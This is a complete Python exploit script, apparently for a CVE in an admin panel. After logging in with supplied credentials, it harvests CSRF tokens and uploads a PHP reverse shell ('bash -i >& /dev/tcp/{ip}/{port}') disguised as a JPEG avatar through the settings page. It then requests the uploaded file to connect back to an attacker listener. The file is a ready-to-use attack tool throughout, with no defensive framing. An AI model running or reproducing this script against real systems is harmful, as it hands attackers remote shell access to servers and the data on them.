import argparse
import requests
from bs4 import BeautifulSoup
import subprocess

BANNER = """
\033[1;31m  _____   _____   ___ __ ___ ____   ___ _ _ ___ _ _  ___
 / __\ \ / / __|_|_  )  \_  )__ /__|_  ) | |_  ) | |/ _ \\
| (__ \ V /| _|___/ / () / / |_ \___/ /|_  _/ /|_  _\_, /
 \___| \_/ |___| /___\__/___|___/  /___| |_/___| |_| /_/  EXPLOIT by IDUZZEL\033[0m
"""

def get_tokens(session, url, endpoint):
    try:
        response = session.get(f"{url}/{endpoint}")
        response.raise_for_status()
    except requests.RequestException as e:
        print(f"[-] Failed to fetch {endpoint} page: {e}")
        return None, None

    soup = BeautifulSoup(response.text, 'html.parser')

    token_input = soup.find('input', {'name': '_token'})
    if not token_input:
        print(f"[-] No _token input found on {endpoint} page")
        return None, None

    token = token_input['value']
    cookies = session.cookies.get_dict()
    return token, cookies

def upload_revshell(url, username, password, ip, port):
    session = requests.Session()
    token, cookies = get_tokens(session, url, 'admin/auth/login')

    if not token:
        print("[-] Unable to retrieve token for login")
        return

    login_data = {
        'username': username,
        'password': password,
        '_token': token
    }
    try:
        login_response = session.post(f"{url}/admin/auth/login", data=login_data, cookies=cookies)
        login_response.raise_for_status()
    except requests.RequestException as e:
        print(f"[-] Login failed: {e}")
        return

    if "Login failed" in login_response.text:
        print("[-] Login failed, check your credentials")
        return

    token, cookies = get_tokens(session, url, 'admin/auth/setting')
    if not token:
        print("[-] Unable to retrieve token for settings")
        return

    # PHP reverse shell script
    revshell_content = f"<?php system('bash -c \"bash -i >& /dev/tcp/{ip}/{port} 0>&1\"'); ?>"

    with open('revshell.php', 'w') as revshell_file:
        revshell_file.write(revshell_content)

    files = {
        'name': (None, 'Administrator'),
        'avatar': ('revshell.php', open('revshell.php', 'rb'), 'image/jpeg'),
        '_token': (None, token),
        '_method': (None, 'PUT')
    }

    try:
        response = session.post(f"{url}/admin/auth/setting", files=files, cookies=cookies)
        response.raise_for_status()
        print("[+] Reverse shell uploaded successfully! Attempting to execute it...")

        # Send GET request to execute the reverse shell in a non-blocking manner
        shell_url = f"{url}/uploads/images/revshell.php"
        subprocess.Popen(['curl', shell_url])

        print(f"[+] Reverse shell executed successfully! Check your listener at {ip}:{port}")
    except requests.RequestException as e:
        print(f"[-] Failed to upload reverse shell: {e}")

def main():
    parser = argparse.ArgumentParser(description="Exploit script for command injection vulnerability")
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-U', '--username', required=True, help='Username')
    parser.add_argument('-P', '--password', required=True, help='Password')
    parser.add_argument('-i', '--ip', required=True, help='IP for reverse shell')
    parser.add_argument('-p', '--port', required=True, help='Port for reverse shell')
    args = parser.parse_args()

    print(BANNER)

    upload_revshell(args.url, args.username, args.password, args.ip, args.port)

if __name__ == "__main__":
    main()